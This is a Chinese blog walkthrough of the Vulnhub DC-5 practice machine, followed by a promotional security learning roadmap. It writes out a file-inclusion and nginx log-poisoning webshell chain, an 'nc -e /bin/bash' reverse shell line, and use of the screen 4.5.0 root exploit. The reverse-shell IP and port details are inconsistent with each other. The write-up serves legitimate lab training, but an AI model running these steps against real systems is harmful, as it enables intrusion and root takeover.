Vulnhub靶机:DC-5

下载环境导入靶机,在kali里面扫描靶机ip地址1641786125_61dbab0dec6005ec75f52.png!small靶机IP:192.168.190.133

扫描端口:1641786174_61dbab3e44d0353a9eeaa.png!small开放了两个tcp端口,我们访问一下ip1641786223_61dbab6f71a1135ca6a0a.png!small在下载靶机的时候说明了只有一个flag,我们在页面试试,发现contact页面评论后会出现thankyou.php1641786349_61dbabed5bcbe1e67121c.png!small而且每次刷新下方的显示不同,扫描一下后台1641786489_61dbac795c32d88b31c47.png!small访问footer.php1641786540_61dbacac61372ac493c1d.png!small同样是每次刷新后内容不同,那猜测下方的年份显示可能是调用文件后返回的数值,尝试一下文件包含,发现成功文件包含1641786681_61dbad39931d45a82e4b6.png!small因为靶机服务扫描时发现靶机网站使用的是nginx服务器,我们知道nginx服务器的默认配置文件是/etc/nginx/nginx.conf,所以将nginx的配置文件包含过来查看日志路径,发现了nginx的日志路径:
access_log /var/log/nginx/access.log; error_log
/var/log/nginx/error.log;1641786868_61dbadf4201171071deb8.png!small向日志文件传输一句话木马让其进行解析,使用burpsuite抓包改包向日志文件传入一句话木马1641786915_61dbae2354356f4e63cd3.png!small使用蚁剑连接1641787063_61dbaeb78051cff41c81b.png!small1641787091_61dbaed3ddada88e6a561.png!small使用虚拟终端反弹shell,蚁剑虚拟终端输入nc
-e /bin/bash 192.168.190.133(kali ip地址) 777,kali监听7777
端口1641787259_61dbaf7bc8e0c4f7e5838.png!small

切换shell外壳

python -c 'import pty;pty.spawn("/bin/bash")'

然后进行提权,使用命令find / -user root -perm -4000 -print 2>/dev/null,查看是否有可利用的suid

1641787585_61dbb0c1121d8f7ae0669.png!small这里不知道哪个有用就看了大佬们的wp,发现screen-4.5.0有漏洞可以利用,使用命令:searchsploit screen 4.5.01641787851_61dbb1cb44d9821a6565e.png!small将文件cp出来1641788008_61dbb268041bf5e7a6983.png!small41154.sh:1641788152_61dbb2f89e2ffb077bd4a.png!small查看文件可以知道,脚本文件需要分3个步骤完成
第一步:将第一部分diam写入libhax.c文件中,在执行相应的命令生成libhax.so文件1641788251_61dbb35b9ef28d54441e5.png!small1641788270_61dbb36edb52a724971f3.png!small第二步:将第二部分的C语言代码写入rootshell文件中,并编译成rooshell文件1641788321_61dbb3a17466bd1dfb375.png!small第三步:将剩下部分的脚本代码写入到dc5.sh文件中,在开头加上#!/bin/bash注明执行环境,保存需要输入为set ff=unix,是为了防止脚本的格式错误1641788395_61dbb3ebf3b9aff63ba4c.png!small查看dc5.sh文件并加上可执行权限1641788489_61dbb449dc97f71543e17.png!small将生成的三个文件通过蚁剑上传到根目录下的/tmp/下1641788600_61dbb4b87c9378026cdbb.png!small然后在反弹shell中使用命令执行dc5.sh文件,命令chmod +x dc5.sh增加可执行权限,执行文件1641788682_61dbb50a35d691f7214eb.png!small查看权限:1641788718_61dbb52e1012e3bc343ef.png!small切换到/root下拿到flag:1641788765_61dbb55db4838a15fae42.png!small

YF3ZF-1691114888344)]

网络安全学习路线

这是一份网络安全从零基础到进阶的学习路线大纲全览,小伙伴们记得点个收藏!

img[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DSAeb5TM-1691114888344)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]编辑

阶段一:基础入门

img[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IvJ3iWCt-1691114888345)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]

网络安全导论

渗透测试基础

网络基础

操作系统基础

Web安全基础

数据库基础

编程基础

CTF基础

该阶段学完即可年薪15w+

阶段二:技术进阶(到了这一步你才算入门)

img[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lFkbh801-1691114888346)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]

弱口令与口令爆破

XSS漏洞

CSRF漏洞

SSRF漏洞

XXE漏洞

SQL注入

任意文件操作漏洞

业务逻辑漏洞

该阶段学完年薪25w+

阶段三:高阶提升

img[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KayghE3d-1691114888346)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]

反序列化漏洞

RCE

综合靶场实操项目

内网渗透

流量分析

日志分析

恶意代码分析

应急响应

实战训练

该阶段学完即可年薪30w+

阶段四:蓝队课程

img[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-hvSrgYPu-1691114888346)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]

蓝队基础

蓝队进阶

该部分主攻蓝队的防御,即更容易被大家理解的网络安全工程师。

攻防兼备,年薪收入可以达到40w+

阶段五:面试指南&阶段六:升级内容

img

需要上述路线图对应的网络安全配套视频、源码以及更多网络安全相关书籍&面试题等内容

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

同学们可以扫描下方二维码获取哦!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值